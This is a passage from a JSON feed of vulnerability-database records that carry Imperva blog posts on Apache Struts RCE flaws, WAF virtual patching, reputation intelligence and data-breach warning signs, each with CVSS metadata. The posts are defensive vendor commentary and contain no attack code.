"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T19:52:24", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-18T17:43:16", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. Given that web apps frequently access back-end data stores, the potential for a RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is a not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe, accomplishing the same thing for any Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, its more cost effective for them to just broadly launch an attack than it is first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it a \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them as both an early indicator, as well as to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by themselves isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. _The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-18T20:33:25", "title": "Apache Struts, RCE and Managing App Risk", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-18T20:33:25", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-14T03:35:02", "description": "[Reputation intelligence](<https://www.imperva.com/app-security/threat-intelligence-101/reputation-intelligence/>) is information about cyber entities known for specific activity, whether malicious or benign, which can be fed to and actioned on by a web application firewall (WAF). It provides an additional application security layer by effectively identifying and blocking threats from known malicious sources. Using reputation intelligence, large amounts of traffic can be classified as malicious or benign, reducing the workload of WAFs to inspect the actual content of that traffic. You can better understand where traffic originates, who is creating it and the potential risk.\n\nWith up to date information on all known cyber entities delivered to your [WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>), reputation intelligence can help block an attack or allow legitimate traffic, which in turn significantly reduces false positives.\n\nExamples of reputation intelligence entities include:\n\n * **Malicious IP Addresses:** Sources that have repeatedly attacked other websites\n * **Anonymous Proxies**: Proxy servers used by attackers to hide their true location\n * **TOR Networks**: Anonymous communication software used by hackers to disguise the source of an attack\n * **IP Geo-location**: Geographic location from which attacks are initiated\n * **Phishing URLs**: Fraudulent sites (URLs) that are used in phishing attacks\n * **Comment Spammers**: IP addresses of known active comment spammers\n * **Remote File Include (RFI):** URLs that were identified as locations from where malicious files are downloaded\n * **SQL Injection IPs:** IP addresses that were identified as serial SQL injection attackers\n * **Scanner IPs:** IP addresses that were identified as serial scanner attackers\n * **Spamdexing:** URLs used in comment spam attacks\n\n## Benefits of Reputation Intelligence\n\nPeople often ask us why they should add reputation intelligence to their WAF. One of our large global customers summed it up best, \u201cReputation intelligence is the low hanging fruit, we just block based on the feeds delivered to the WAF and see immediate value \u2013 I\u2019m blocking the bad guys without creating new security rules.\u201d This is the fundamental benefit delivered by reputation intelligence \u2013 automated blocking of threats based on specific entities, such as IPs or URLs.\n\nThere are additional benefits to adding reputation intelligence to your WAF such as gaining geo-location information to reduce false positives and establish and enforce business policies. For example, many enterprises have geo-location restrictions. Some media entertainment companies such as Netflix provide service to their customers in the US only and they could use a geo-location feature to enforce that policy.\n\nReputation intelligence is also used to minimize false positives generated by a WAF by providing white list resources:\n\n * CDN IP addresses\n * Legitimate search engines\n * Well-known \u201cgood\u201d (non-malicious) entities\n\nA WAF can use this intelligence to exclude certain entities from strict policies. For example, if you want to block scanning attempts based on the resource polling frequency from servers you can do it while allowing legitimate search engine indexing traffic to avoid false positives.\n\nReputation intelligence will enable a WAF to enforce other business-oriented policies. For example, some enterprises want to allow users browsing access to their website from certain countries that use anonymized proxies. On the other hand, attackers frequently use automated tools behind anonymized proxies to attack web applications. A WAF with reputation intelligence can set a granular policy to block automated tools that hide behind anonymous proxies and TOR networks while allowing legitimate human traffic.\n\nApart from delivering feeds on cyber entities, reputation intelligence is also used to mitigate zero-day attacks. After the latest Apache Struts remote code execution vulnerability was released ([CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)) Imperva used its reputation intelligence service to push the mitigation for it in a matter of hours to SecureSphere WAF customers providing them with zero-day protection.\n\n## Measuring the Quality of Reputation Intelligence\n\nVarious vendors offer reputation intelligence services, so how do you know which one is best? Great question, difficult answer. If there are a lot of false positives that\u2019s an obvious indicator that the reputation intelligence service feed is not high quality and you don\u2019t want to use it. But there are several parameters to consider. Here\u2019s what to look for:\n\n * **Size of feed** \u2013 The number of entries in the feed will vary by the content\u2014from a few hundred to a few thousand\u2014but they should represent the real-world landscape of good and bad cyber entities that extend beyond IP addresses to include phishing sites, TOR networks, and proxies. For example, you might expect a feed of dedicated phishing sites to contain a few dozen active sites, malicious SQL injection IPs to contain a few hundred, and IP comment spam as much as 50,000 IPs.\n * **False-positive and true-positive rates** \u2013 This reflects the accuracy of the feed. Lower false-positive rates and higher true-positives rates indicate better feed quality.\n * **Geographic diversity** \u2013 In cases where a company\u2019s business is open to the entire world, you will want reputation feeds that cover all parts of the world and aren't limited to a specific geo-location, such as US traffic only.\n * **Reputation intelligence updates** \u2013 Most malicious entities are constantly changing. IPs on the world wide web are dynamically allocated to users. For example, the majority of phishing sites remain active for [only four to eight hours](<https://www.darkreading.com/threat-intelligence/14-million-new-phishing-sites-launched-each-month/d/d-id/1329955>). Therefore, the frequency in which the feeds are updated is important.\n\nYou need to be sure that a vendor\u2019s coverage of the web is wide enough. Vendors that see many gigabits of traffic per day across different regions around the world will have more visibility to provide more accurate coverage. This will dramatically increase the size of the feed and the true positive rate, reduce the number of false positives and provide higher diversity of resources.\n\n## You Have Reputation Intelligence, Now What?\n\nOnce you have reputation intelligence delivered via automated feed to your WAF you can take the following actions:\n\n * **Block threats** \u2013 With high quality reputation intelligence feeds you will see a low-to-zero false-positive rate and can begin using WAF in blocking mode.\n * **Perform forensics** \u2013 Gather reputation based traffic in your estate and use it to correlate with other security devices for forensics and incident response.\n * **Build** **compound policies** \u2013 Use the reputation intelligence feeds to create more robust security policies. For example, IP comment spam resource feeds can be combined with the behavior characteristics of publishing a comment on a web site (such as POST HTTP method and a parameter with a URL).\n\nIn summary, reputation intelligence improves your application security posture, reduces false positives, increases accuracy and mitigates zero day threats.\n\nLearn more about Imperva [reputation intelligence services](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) or [request a demo](<https://www.imperva.com/Resources/RequestDemo?src=WWW:RequestDemo:US:product-banner:demopage>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-13T16:30:38", "type": "impervablog", "title": "How Reputation Intelligence Improves Application Security", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9805"], "modified": "2017-11-13T16:30:38", "href": "https://www.imperva.com/blog/2017/11/how-reputation-intelligence-improves-application-security/", "id": "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2022-09-12T15:28:21", "description": "## Key signs to look for in today\u2019s complex data threat landscape\n\n## Introduction\n\nThe most vulnerable data repositories are the ones deep in your organization\u2019s infrastructure. Everyone assumes they are safe, but as with your home, organizations must invest in security at entry points. Otherwise, the result is unsecured valuables lying around out in the open or easy to find in obvious closets or drawers.\n\nWhat happens to security when someone known to the homeowners, like a plumber, gardener, or friend, has access to the house? It becomes much easier for other people to exploit the homeowner and access the property.\n\nThe same principle applies to organizations. They deploy most of their security strategy on the perimeter and leave their \u201cdeep\u201d data repositories vulnerable to data breaches. Bad actors have the opportunity to exploit organization insiders or third-party software components. A [2022 Forrester report](<https://www.imperva.com/resources/resource-library/white-papers/forrester-insider-threats-drive-data-protection-improvements-full-report/>) revealed that 58 percent of sensitive data incidents are caused by insiders, either from non-malicious mistakes or deliberately malicious actions. The report also revealed that 82 percent of organizations do not have an insider risk management strategy or policy. It doesn\u2019t, however, have to be this way.\n\nYour data repositories contain the sensitive personal data of your business, employees, and customers, and, much like the valuables around your home, you should have a security strategy to safeguard them effectively. Staying with the home security metaphor, you need to consider turning the containers of your valuables into secure vessels, minimizing the number of people who could secure access, and gaining the ability to inventory losses when they happen. In data security, this means encryption, minimal entitlements, access control, and advanced analytics. Forrester data suggests, however, that not all organizations understand how to create an effective data security strategy, and their biggest mistake is not effectively addressing the insider threat.\n\nTwo critical business trends contribute to the ease with which bad actors can sneak undetected into your organization's infrastructure and breach sensitive data, and we address them in this post. Next, we\u2019ll explain general data breach attack flows and profile typical attackers to help you gain a better understanding of who and what to look for. Finally, we\u2019ll make some recommendations on how you can integrate a modern data security fabric with existing tools to create an effective, sustainable data security strategy.\n\nThe cost of an intruder who has access to the \u201chouse\u201d on an ongoing basis cannot be overstated. Every day, bad actors can exploit your vulnerable data repositories and your structured, semi-structured, and unstructured data to exfiltrate the sensitive information for which you are responsible. This can easily play a role in the data exfiltration process by acting as temporary storage or a proxy to transport the data from a secure environment to an unprotected environment and then to the outside. This is the essence of a data breach - a successful attempt to open the closet or \u201ccrack\u201d the safe and expose the sensitive personal data contained in it.\n\n## Two business trends make organizations vulnerable\n\n 1. **The need to integrate with external technology providers.** Some CISOs and their team members struggle to secure a business services environment, which becomes additionally challenging as business operations agility grows.\n 2. **The evolution of cloud computing.** As organizations transition to the cloud, they are using third-party cloud-managed computing environments and third-party SaaS services to accelerate the migration process.\n\n## Data breaches are far more common today because of third parties\n\nRelying on third party code and services providers means that an organization's information technology infrastructure is exposed to suppliers that do not have a robust data security strategy aligned with the organization\u2019s own. The risk becomes much greater as every third-party technology provider's security vulnerabilities, in effect, become yours.\n\nThe first step for CISOs and their security teams is to secure all sensitive data assets and gain complete visibility into all data repositories that are part of the organization's architecture. This includes legacy repositories deep in the architecture and new ones, in on-premises and cloud-managed environments. Even data repositories that you don\u2019t know exist yet. When you have that level of visibility, then you can evaluate vulnerabilities, figure out who should have privileged access to the repositories and why, then optimize your detection and response process to deal with potential breaches.\n\n## General data breach attack flows\n\nMost data breaches have common characteristics, no matter the details of the breach. First, the attacker needs to penetrate the organization's IT (Information Technology) or OT (Operational Technology) environments, look around and find the asset of interest that it can take.\n\n### Examples of Early Signs of a Data Breach\n\n**Signs in critical stages:**\n\n**Reconnaissance:**\n\n * System tables scan\n * Massive database scan\n * Multiple login attempts\n\n**Exploitation:**\n\n * Open command shell\n * Machine takeover\n\n**Data Access:**\n\n * Service account misuse\n * Retrieving high numbers of records\n * Accessing business-critical data\n\n**General Signs:**\n\n * Work/activity in unusual hours\n * Use of dynamic SQL\n\n## Data breach attacker types\n\n### Hit & Run\n\nThis \u201cOpportunist\u201d identifies an opportunity; whether it is a vulnerability, a publicly open database, or something else. The bad actor decides to take what they can and leave. This kind of attacker will not try to search for other databases or penetrate the organization\u2019s network, or try to execute exotic exploits, etc. They will just take what they can, and then sell it to the highest bidder.\n\n### The Curious\n\nThis attacker usually sets out with a purpose, but may decide to look deeper. They may look around a little bit, but not too much. They are still focused on their original purpose, malware deployment, data exfiltration, etc.\n\n### The Resident\n\nThe most dangerous type, as in the \u201cEquifax\u201d breach, the Resident will gain access to the organization\u2019s network and will stay for months, sometimes years. They will use keyloggers, sniffers, and other methods to steal credentials and compromise databases, using \u201c[Low and Slow](<https://www.imperva.com/blog/the-account-takeover-threat-a-by-the-numbers-breakdown/>)\u201d and other methods to stay undetected.\n\n## Common data breach attack examples\n\nThe attacks that cause the greatest damage are \u2018The resident\u2019 attacks. Let's consider some examples to understand how these attacks are forged.\n\n### The resident attack\n\nInfosec disasters are typically the result of multiple failures. Invariably, post-breach analysis reveals several security weaknesses that allowed attackers to steal terabytes of information from supposedly secure systems.\n\nThere are several well-known, high-impact incident reports, such as Equifax, Anthem Inc., and the U.S. Office of Personnel Management that describe pre-breach progressions falling under this category.\n\n### Typical attack flow\n\n 1. The initial hack is done via a web-facing application, one example can be the Equifax customer complaint portal and its CVE-2017-5638 vulnerability. **ThreatPost:** _\u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638.\u201d_\n 2. Attackers exploit weaknesses in the company's security posture, notably the lack of proper segmentation.\n 3. In almost all major breaches, a lack of continuous security patching of servers and databases contributes to the attack\u2019s 